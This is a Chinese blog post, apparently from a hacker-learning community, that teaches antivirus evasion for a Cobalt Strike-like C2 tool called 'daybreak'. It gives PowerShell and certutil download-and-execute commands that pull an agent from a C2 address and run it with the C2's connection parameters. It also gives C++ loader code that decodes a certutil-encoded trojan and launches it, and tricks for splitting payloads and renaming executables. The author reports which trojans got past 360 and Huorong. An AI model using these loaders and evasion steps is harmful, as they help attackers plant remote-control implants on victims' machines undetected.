免杀学习-从指令绕过开始-1

破晓

免杀新伙伴-daybreak,这个工具是类似CS的工具

下面的图片是它的控制界面,利用了Web界面更加简介美观且自带中文

图片[1]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

分析一下它自带的上线语句

图片[2]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

支持多种操作系统的上线,相比CS需要按照插件才能上线linux更加集成

支持利用powershell和certutil指令进行上线操作

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:1338/d/pzxsnoqd','pzxsnoqd.exe') && pzxsnoqd.exe agent -u http://127.0.0.1:1338 -s e75tdmwe

certutil -urlcache -gmt -split -f http://127.0.0.1:1338/d/pzxsnoqd pzxsnoqd.exe && pzxsnoqd.exe agent -u http://127.0.0.1:1338 -s e75tdmwe

需要注意的是破晓的上线操作需要利用探针的参数才行,比如这里的e75tdmwe

初步测试

我们将自带的命令进行编译生成exe文件直接尝试上线

图片[3]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

在360环境下测试

图片[4]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

静态免杀没问题,尝试上线

图片[5]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

上线失败被阻止

在火绒环境下运行

静态云查杀依旧没有问题

图片[6]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

尝试上线

图片[7]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

果然还是被阻止了

进行文件分析

效果显示很不错

https://www.virustotal.com/gui/

图片[8]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

这个就更离谱了

https://www.virscan.org/language/zh-cn/

图片[9]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

进阶

通过利用certutil自带的加解密功能进行木马的免杀

加密代码

Certutil -encode C+Powershell.exe out.txt

C语言源码

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <iostream>
#include <fstream>
using namespace std;

int main()
{
    char automobie[50];
    ofstream outfile;
    #将解密的内容写入一个文件中
    outfile.open("encryption.txt");
    outfile.setf(ios_base::showpoint);
    outfile << "-----BEGIN CERTIFICATE-----\n"
        #C2文件加密的内容
        "-----END CERTIFICATE-----\n"
            << endl;
    outfile.close();
    #进行解密
    system("Certutil -decode encryption.txt test.exe");
    #确保上述代码运行完成
    Sleep(5000);
    system("test.exe C2执行参数");
    return 0;
}

再次编译生成exe文件,点击运行,首先产生一个解码文件,然后再次产生可执行文件,最终达到上线,下图时

图片[10]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

火绒环境下

发现成功产生了解密文件和木马文件,但木马文件运行时仍出现告警

360环境下

我没想到火绒杀了,联网的360居然没杀,成功上线

图片[11]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

进行360木马查杀中的快速查杀,居然还没杀掉

图片[12]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

技巧一(缝合)

当我们利用certutil进行的时候,会发现我们加密后的数据过于冗长可能会在上传过程中遇到很多问题,那么我们可以利用文件切割,再利用我们的COPY指令进行缝合

copy 1.txt+2.txt+...+n.txt  out.txt

最后利用

certutil -decode out.txt   C2可执行文件名.exe

我们通过以下命令进行加密,产生txt文件

Certutil -encode C+Powershell.exe out.txt

利用文本切割器,按照每500行一份进行切割

文本切割器网站
https://uutool.cn/txt-incise/

图片[13]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

我们将文本缝合后利用certutil进行解密

certutil -decode out.txt test.exe

图片[14]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

运行木马程序

火绒报错

360在文本进行编译成exe后直接报警

图片[15]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

技巧二(冷知识)

windows命令行,中执行命令对文件判断时,不是判断文件后缀而是判断文件头,因此如果我们是exe文件,我们修改后缀为jpg等依旧可以额执行命令

测试代码如下

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <iostream>
#include <fstream>
using namespace std;

int main()
{
    char automobie[50];
    ofstream outfile;
    outfile.open("encryption.txt");
    outfile.setf(ios_base::showpoint);
    outfile << "-----BEGIN CERTIFICATE-----\n"

"-----END CERTIFICATE-----\n"
            << endl;
    outfile.close();
    return 0;
}

进行命令执行

图片[16]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

命令执行结果

图片[17]-白帽子黑客在线学习与交流社区免杀学习-从指令绕过开始-1-白帽子黑客在线学习与交流社区民间安全

但当我们想直接在C中将解密后的文件修改后缀再启动时,会遇到以下错误,解密文件会产生成功但无法执行

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容